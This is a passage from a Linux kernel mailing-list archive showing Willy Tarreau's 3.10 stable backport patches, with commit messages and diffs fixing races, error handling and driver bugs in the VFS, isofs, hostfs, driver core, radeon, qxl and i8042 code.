In this case thaw_super() will wrongly call s_op->unfreeze_fs() before
it was actually frozen, and call sb_freeze_unlock() which leads to the
unbalanced percpu_up_write(). Unfortunately lockdep can't detect this,
so this triggers misc BUG_ON()'s in kernel/rcu/sync.c.

Reported-and-tested-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/super.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/fs/super.c b/fs/super.c
index 97280e7..fd3281d 100644
--- a/fs/super.c
+++ b/fs/super.c
@@ -1327,8 +1327,8 @@ int freeze_super(struct super_block *sb)
 		}
 	}
 	/*
-	 * This is just for debugging purposes so that fs can warn if it
-	 * sees write activity when frozen is set to SB_FREEZE_COMPLETE.
+	 * For debugging purposes so that fs can warn if it sees write activity
+	 * when frozen is set to SB_FREEZE_COMPLETE, and for thaw_super().
 	 */
 	sb->s_writers.frozen = SB_FREEZE_COMPLETE;
 	up_write(&sb->s_umount);
@@ -1347,7 +1347,7 @@ int thaw_super(struct super_block *sb)
 	int error;
 
 	down_write(&sb->s_umount);
-	if (sb->s_writers.frozen == SB_UNFROZEN) {
+	if (sb->s_writers.frozen != SB_FREEZE_COMPLETE) {
 		up_write(&sb->s_umount);
 		return -EINVAL;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (73 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
                   ` (143 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Kara, Willy Tarreau

From: Jan Kara <jack@suse.cz>

commit a2ed0b391dd9c3ef1d64c7c3e370f4a5ffcd324a upstream.

When isofs_mount() is called to mount a device read-write, it returns
EACCES even before it checks that the device actually contains an isofs
filesystem. This may confuse mount(8) which then tries to mount all
subsequent filesystem types in read-only mode.

Fix the problem by returning EACCES only once we verify that the device
indeed contains an iso9660 filesystem.

Fixes: 17b7f7cf58926844e1dd40f5eb5348d481deca6a
Reported-by: Kent Overstreet <kent.overstreet@gmail.com>
Reported-by: Karel Zak <kzak@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/isofs/inode.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/isofs/inode.c b/fs/isofs/inode.c
index 10489bb..955fabf 100644
--- a/fs/isofs/inode.c
+++ b/fs/isofs/inode.c
@@ -726,6 +726,11 @@ static int isofs_fill_super(struct super_block *s, void *data, int silent)
 	pri_bh = NULL;
 
 root_found:
+	/* We don't support read-write mounts */
+	if (!(s->s_flags & MS_RDONLY)) {
+		error = -EACCES;
+		goto out_freebh;
+	}
 
 	if (joliet_level && (pri == NULL || !opt.rock)) {
 		/* This is the case of Joliet with the norock mount flag.
@@ -1538,9 +1543,6 @@ struct inode *__isofs_iget(struct super_block *sb,
 static struct dentry *isofs_mount(struct file_system_type *fs_type,
 	int flags, const char *dev_name, void *data)
 {
-	/* We don't support read-write mounts */
-	if (!(flags & MS_RDONLY))
-		return ERR_PTR(-EACCES);
 	return mount_bdev(fs_type, flags, dev_name, data, isofs_fill_super);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (74 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
                   ` (142 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Richard Weinberger, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 8a545f185145e3c09348cd74326268ecfc6715a3 upstream.

We can't pass error pointers to kfree() or it causes an oops.

Fixes: 52b209f7b848 ('get rid of hostfs_read_inode()')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/hostfs/hostfs_kern.c | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/fs/hostfs/hostfs_kern.c b/fs/hostfs/hostfs_kern.c
index b58a9cb..f0faa87 100644
--- a/fs/hostfs/hostfs_kern.c
+++ b/fs/hostfs/hostfs_kern.c
@@ -942,10 +942,11 @@ static int hostfs_fill_sb_common(struct super_block *sb, void *d, int silent)
 
 	if (S_ISLNK(root_inode->i_mode)) {
 		char *name = follow_link(host_root_path);
-		if (IS_ERR(name))
+		if (IS_ERR(name)) {
 			err = PTR_ERR(name);
-		else
-			err = read_name(root_inode, name);
+			goto out_put;
+		}
+		err = read_name(root_inode, name);
 		kfree(name);
 		if (err)
 			goto out_put;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device"
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (75 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
                   ` (141 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Markus Elfring, Greg Kroah-Hartman, Willy Tarreau

From: Markus Elfring <elfring@users.sourceforge.net>

commit 5f0163a5ee9cc7c59751768bdfd94a73186debba upstream.

The put_device() function tests whether its argument is NULL and then
returns immediately. Thus the test around the call is not needed.

This issue was detected by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: backported only to ease next patch as suggested by Jiri]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/base/core.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index 2a19097..d92ecf3 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -1138,8 +1138,7 @@ done:
 	kobject_del(&dev->kobj);
  Error:
 	cleanup_device_parent(dev);
-	if (parent)
-		put_device(parent);
+	put_device(parent);
 name_error:
 	kfree(dev->p);
 	dev->p = NULL;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (76 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
                   ` (140 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ming Lei, Yijing Wang, Greg Kroah-Hartman, Willy Tarreau

From: Ming Lei <ming.lei@canonical.com>

commit cebf8fd16900fdfd58c0028617944f808f97fe50 upstream.

The global mutex of 'gdp_mutex' is used to serialize creating/querying
glue dir and its cleanup. Turns out it isn't a perfect way because
part(kobj_kset_leave()) of the actual cleanup action() is done inside
the release handler of the glue dir kobject. That means gdp_mutex has
to be held before releasing the last reference count of the glue dir
kobject.

This patch moves glue dir's cleanup after kobject_del() in device_del()
for avoiding the race.

Cc: Yijing Wang <wangyijing@huawei.com>
Reported-by: Chandra Sekhar Lingutla <clingutla@codeaurora.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/base/core.c | 39 +++++++++++++++++++++++++++++----------
 1 file changed, 29 insertions(+), 10 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index d92ecf3..986fc4e 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -827,11 +827,29 @@ static struct kobject *get_device_parent(struct device *dev,
 	return NULL;
 }
 
+static inline bool live_in_glue_dir(struct kobject *kobj,
+				    struct device *dev)
+{
+	if (!kobj || !dev->class ||
+	    kobj->kset != &dev->class->p->glue_dirs)
+		return false;
+	return true;
+}
+
+static inline struct kobject *get_glue_dir(struct device *dev)
+{
+	return dev->kobj.parent;
+}
+
+/*
+ * make sure cleaning up dir as the last step, we need to make
+ * sure .release handler of kobject is run with holding the
+ * global lock
+ */
 static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
 {
 	/* see if we live in a "glue" directory */
-	if (!glue_dir || !dev->class ||
-	    glue_dir->kset != &dev->class->p->glue_dirs)
+	if (!live_in_glue_dir(glue_dir, dev))
 		return;
 
 	mutex_lock(&gdp_mutex);
@@ -839,11 +857,6 @@ static void cleanup_glue_dir(struct device *dev, struct kobject *glue_dir)
 	mutex_unlock(&gdp_mutex);
 }
 
-static void cleanup_device_parent(struct device *dev)
-{
-	cleanup_glue_dir(dev, dev->kobj.parent);
-}
-
 static int device_add_class_symlinks(struct device *dev)
 {
 	int error;
@@ -1007,6 +1020,7 @@ int device_add(struct device *dev)
 	struct kobject *kobj;
 	struct class_interface *class_intf;
 	int error = -EINVAL;
+	struct kobject *glue_dir = NULL;
 
 	dev = get_device(dev);
 	if (!dev)
@@ -1051,8 +1065,10 @@ int device_add(struct device *dev)
 	/* first, register with generic layer. */
 	/* we require the name to be set before, and pass NULL */
 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
-	if (error)
+	if (error) {
+		glue_dir = get_glue_dir(dev);
 		goto Error;
+	}
 
 	/* notify platform of device entry */
 	if (platform_notify)
@@ -1135,9 +1151,10 @@ done:
 	device_remove_file(dev, &uevent_attr);
  attrError:
 	kobject_uevent(&dev->kobj, KOBJ_REMOVE);
+	glue_dir = get_glue_dir(dev);
 	kobject_del(&dev->kobj);
  Error:
-	cleanup_device_parent(dev);
+	cleanup_glue_dir(dev, glue_dir);
 	put_device(parent);
 name_error:
 	kfree(dev->p);
@@ -1209,6 +1226,7 @@ void put_device(struct device *dev)
 void device_del(struct device *dev)
 {
 	struct device *parent = dev->parent;
+	struct kobject *glue_dir = NULL;
 	struct class_interface *class_intf;
 
 	/* Notify clients of device removal.  This call must come
@@ -1250,8 +1268,9 @@ void device_del(struct device *dev)
 	if (platform_notify_remove)
 		platform_notify_remove(dev);
 	kobject_uevent(&dev->kobj, KOBJ_REMOVE);
-	cleanup_device_parent(dev);
+	glue_dir = get_glue_dir(dev);
 	kobject_del(&dev->kobj);
+	cleanup_glue_dir(dev, glue_dir);
 	put_device(parent);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (77 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
                   ` (139 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Christian König, Alex Deucher, Willy Tarreau

From: Christian König <christian.koenig@amd.com>

commit 13f479b9df4e2bbf2d16e7e1b02f3f55f70e2455 upstream.

This bug seems to be present for a very long time.

Signed-off-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/radeon/radeon_ttm.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/radeon/radeon_ttm.c b/drivers/gpu/drm/radeon/radeon_ttm.c
index f701559..6c92c20 100644
--- a/drivers/gpu/drm/radeon/radeon_ttm.c
+++ b/drivers/gpu/drm/radeon/radeon_ttm.c
@@ -228,8 +228,8 @@ static int radeon_move_blit(struct ttm_buffer_object *bo,
 
 	rdev = radeon_get_rdev(bo->bdev);
 	ridx = radeon_copy_ring_index(rdev);
-	old_start = old_mem->start << PAGE_SHIFT;
-	new_start = new_mem->start << PAGE_SHIFT;
+	old_start = (u64)old_mem->start << PAGE_SHIFT;
+	new_start = (u64)new_mem->start << PAGE_SHIFT;
 
 	switch (old_mem->mem_type) {
 	case TTM_PL_VRAM:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (78 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
                   ` (138 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Vetter, Alexander Potapenko, Daniel Vetter, Dave Airlie,
	Willy Tarreau

From: Daniel Vetter <daniel.vetter@ffwll.ch>

commit 6f00975c619064a18c23fd3aced325ae165a73b9 upstream.

Somehow this one slipped through, which means drivers without modeset
support can be oopsed (since those also don't call
drm_mode_config_init, which means the crtc lookup will chase an
uninitalized idr).

Reported-by: Alexander Potapenko <glider@google.com>
Cc: Alexander Potapenko <glider@google.com>
Signed-off-by: Daniel Vetter <daniel.vetter@intel.com>
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/drm_crtc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/gpu/drm/drm_crtc.c b/drivers/gpu/drm/drm_crtc.c
index c24c356..121680f 100644
--- a/drivers/gpu/drm/drm_crtc.c
+++ b/drivers/gpu/drm/drm_crtc.c
@@ -3422,6 +3422,9 @@ int drm_mode_page_flip_ioctl(struct drm_device *dev,
 	int hdisplay, vdisplay;
 	int ret = -EINVAL;
 
+	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+		return -EINVAL;
+
 	if (page_flip->flags & ~DRM_MODE_PAGE_FLIP_FLAGS ||
 	    page_flip->reserved != 0)
 		return -EINVAL;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (79 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
                   ` (137 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michel Dänzer, Michel D�nzer, Willy Tarreau

From: Michel Dänzer <michel@daenzer.net>

NOTE: This patch only applies to 4.5.y or older kernels. With newer
kernels, this problem cannot happen because the driver now uses
drm_crtc_vblank_on/off instead of drm_vblank_pre/post_modeset[0]. I
consider this patch safer for older kernels than backporting the API
change, because drm_crtc_vblank_on/off had various issues in older
kernels, and I'm not sure all fixes for those have been backported to
all stable branches where this patch could be applied.

    ---------------------

Fixes the vblank interrupt being disabled when it should be on, which
can cause at least the following symptoms:

* Hangs when running 'xset dpms force off' in a GNOME session with
  gnome-shell using DRI2.
* RandR 1.4 slave outputs freezing with garbage displayed using
  xf86-video-ati 7.8.0 or newer.

[0] See upstream commit:

commit 777e3cbc791f131806d9bf24b3325637c7fc228d
Author: Daniel Vetter <daniel.vetter@ffwll.ch>
Date:   Thu Jan 21 11:08:57 2016 +0100

    drm/radeon: Switch to drm_vblank_on/off

Reported-and-Tested-by: Max Staudt <mstaudt@suse.de>
Reviewed-by: Daniel Vetter <daniel@ffwll.ch>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Michel Dänzer <michel.daenzer@amd.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/radeon/atombios_crtc.c      | 2 ++
 drivers/gpu/drm/radeon/radeon_legacy_crtc.c | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c
index 8ac3330..4d09582 100644
--- a/drivers/gpu/drm/radeon/atombios_crtc.c
+++ b/drivers/gpu/drm/radeon/atombios_crtc.c
@@ -257,6 +257,8 @@ void atombios_crtc_dpms(struct drm_crtc *crtc, int mode)
 			atombios_enable_crtc_memreq(crtc, ATOM_ENABLE);
 		atombios_blank_crtc(crtc, ATOM_DISABLE);
 		drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+		/* Make sure vblank interrupt is still enabled if needed */
+		radeon_irq_set(rdev);
 		radeon_crtc_load_lut(crtc);
 		break;
 	case DRM_MODE_DPMS_STANDBY:
diff --git a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
index bc73021..ae0d7b1 100644
--- a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
+++ b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
@@ -331,6 +331,8 @@ static void radeon_crtc_dpms(struct drm_crtc *crtc, int mode)
 			WREG32_P(RADEON_CRTC_EXT_CNTL, crtc_ext_cntl, ~(mask | crtc_ext_cntl));
 		}
 		drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+		/* Make sure vblank interrupt is still enabled if needed */
+		radeon_irq_set(rdev);
 		radeon_crtc_load_lut(crtc);
 		break;
 	case DRM_MODE_DPMS_STANDBY:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 182/319] qxl: check for kmap failures
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (80 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
                   ` (136 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Daniel Vetter, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit f4cceb2affcd1285d4ce498089e8a79f4cd2fa66 upstream.

If kmap fails, it leads to memory corruption.

Fixes: f64122c1f6ad ('drm: add new QXL driver. (v1.4)')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/20160711084633.GA31411@mwanda
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/qxl/qxl_draw.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/gpu/drm/qxl/qxl_draw.c b/drivers/gpu/drm/qxl/qxl_draw.c
index 3c8c3db..ff32052 100644
--- a/drivers/gpu/drm/qxl/qxl_draw.c
+++ b/drivers/gpu/drm/qxl/qxl_draw.c
@@ -114,6 +114,8 @@ static int qxl_palette_create_1bit(struct qxl_bo **palette_bo,
 				    palette_bo);
 
 	ret = qxl_bo_kmap(*palette_bo, (void **)&pal);
+	if (ret)
+		return ret;
 	pal->num_ents = 2;
 	pal->unique = unique++;
 	if (visual == FB_VISUAL_TRUECOLOR || visual == FB_VISUAL_DIRECTCOLOR) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (81 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
                   ` (135 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit 4097461897df91041382ff6fcd2bfa7ee6b2448c upstream.

As explained in 1407814240-4275-1-git-send-email-decui@microsoft.com we
have a hard load dependency between i8042 and atkbd which prevents
keyboard from working on Gen2 Hyper-V VMs.

> hyperv_keyboard invokes serio_interrupt(), which needs a valid serio
> driver like atkbd.c.  atkbd.c depends on libps2.c because it invokes
> ps2_command().  libps2.c depends on i8042.c because it invokes
> i8042_check_port_owner().  As a result, hyperv_keyboard actually
> depends on i8042.c.
>
> For a Generation 2 Hyper-V VM (meaning no i8042 device emulated), if a
> Linux VM (like Arch Linux) happens to configure CONFIG_SERIO_I8042=m
> rather than =y, atkbd.ko can't load because i8042.ko can't load(due to
> no i8042 device emulated) and finally hyperv_keyboard can't work and
> the user can't input: https://bugs.archlinux.org/task/39820
> (Ubuntu/RHEL/SUSE aren't affected since they use CONFIG_SERIO_I8042=y)

To break the dependency we move away from using i8042_check_port_owner()
and instead allow serio port owner specify a mutex that clients should use
to serialize PS/2 command stream.

Reported-by: Mark Laws <mdl@60hz.org>
Tested-by: Mark Laws <mdl@60hz.org>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/serio/i8042.c  | 16 +---------------
 drivers/input/serio/libps2.c | 10 ++++------
 include/linux/i8042.h        |  6 ------
 include/linux/serio.h        | 24 +++++++++++++++++++-----
 4 files changed, 24 insertions(+), 32 deletions(-)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 9870c54..2513c8a 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1223,6 +1223,7 @@ static int __init i8042_create_kbd_port(void)
 	serio->start		= i8042_start;
 	serio->stop		= i8042_stop;
 	serio->close		= i8042_port_close;
+	serio->ps2_cmd_mutex	= &i8042_mutex;
 	serio->port_data	= port;
 	serio->dev.parent	= &i8042_platform_device->dev;
 	strlcpy(serio->name, "i8042 KBD port", sizeof(serio->name));
@@ -1310,21 +1311,6 @@ static void i8042_unregister_ports(void)
 	}
 }
 
-/*
- * Checks whether port belongs to i8042 controller.
- */
-bool i8042_check_port_owner(const struct serio *port)
-{
-	int i;
-
-	for (i = 0; i < I8042_NUM_PORTS; i++)
-		if (i8042_ports[i].serio == port)
-			return true;
-
-	return false;
-}
-EXPORT_SYMBOL(i8042_check_port_owner);
-
 static void i8042_free_irqs(void)
 {
 	if (i8042_aux_irq_registered)
diff --git a/drivers/input/serio/libps2.c b/drivers/input/serio/libps2.c
index 07a8363..b5ec313 100644
--- a/drivers/input/serio/libps2.c
+++ b/drivers/input/serio/libps2.c
@@ -57,19 +57,17 @@ EXPORT_SYMBOL(ps2_sendbyte);
 
 void ps2_begin_command(struct ps2dev *ps2dev)
 {
-	mutex_lock(&ps2dev->cmd_mutex);
+	struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex;
 
-	if (i8042_check_port_owner(ps2dev->serio))
-		i8042_lock_chip();
+	mutex_lock(m);
 }
 EXPORT_SYMBOL(ps2_begin_command);
 
 void ps2_end_command(struct ps2dev *ps2dev)
 {
-	if (i8042_check_port_owner(ps2dev->serio))
-		i8042_unlock_chip();
+	struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex;
 
-	mutex_unlock(&ps2dev->cmd_mutex);
+	mutex_unlock(m);
 }
 EXPORT_SYMBOL(ps2_end_command);
 
diff --git a/include/linux/i8042.h b/include/linux/i8042.h
index a986ff5..801c307 100644
--- a/include/linux/i8042.h
+++ b/include/linux/i8042.h
@@ -38,7 +38,6 @@ struct serio;
 void i8042_lock_chip(void);
 void i8042_unlock_chip(void);
 int i8042_command(unsigned char *param, int command);
-bool i8042_check_port_owner(const struct serio *);
 int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str,
 					struct serio *serio));
 int i8042_remove_filter(bool (*filter)(unsigned char data, unsigned char str,
@@ -59,11 +58,6 @@ static inline int i8042_command(unsigned char *param, int command)
 	return -ENODEV;
 }
 
-static inline bool i8042_check_port_owner(const struct serio *serio)
-{
-	return false;
-}
-
 static inline int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str,
 					struct serio *serio))
 {
diff --git a/include/linux/serio.h b/include/linux/serio.h
index 36aac73..deffa474 100644
--- a/include/linux/serio.h
+++ b/include/linux/serio.h
@@ -28,7 +28,8 @@ struct serio {
 
 	struct serio_device_id id;
 
-	spinlock_t lock;		/* protects critical sections from port's interrupt handler */
+	/* Protects critical sections from port's interrupt handler */
+	spinlock_t lock;
 
 	int (*write)(struct serio *, unsigned char);
 	int (*open)(struct serio *);
@@ -37,16 +38,29 @@ struct serio {
 	void (*stop)(struct serio *);
 
 	struct serio *parent;
-	struct list_head child_node;	/* Entry in parent->children list */
+	/* Entry in parent->children list */
+	struct list_head child_node;
 	struct list_head children;
-	unsigned int depth;		/* level of nesting in serio hierarchy */
+	/* Level of nesting in serio hierarchy */
+	unsigned int depth;
 
-	struct serio_driver *drv;	/* accessed from interrupt, must be protected by serio->lock and serio->sem */
-	struct mutex drv_mutex;		/* protects serio->drv so attributes can pin driver */
+	/*
+	 * serio->drv is accessed from interrupt handlers; when modifying
+	 * caller should acquire serio->drv_mutex and serio->lock.
+	 */
+	struct serio_driver *drv;
+	/* Protects serio->drv so attributes can pin current driver */
+	struct mutex drv_mutex;
 
 	struct device dev;
 
 	struct list_head node;
+
+	/*
+	 * For use by PS/2 layer when several ports share hardware and
+	 * may get indigestion when exposed to concurrent access (i8042).
+	 */
+	struct mutex *ps2_cmd_mutex;
 };
 #define to_serio_port(d)	container_of(d, struct serio, dev)
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (82 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
                   ` (134 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
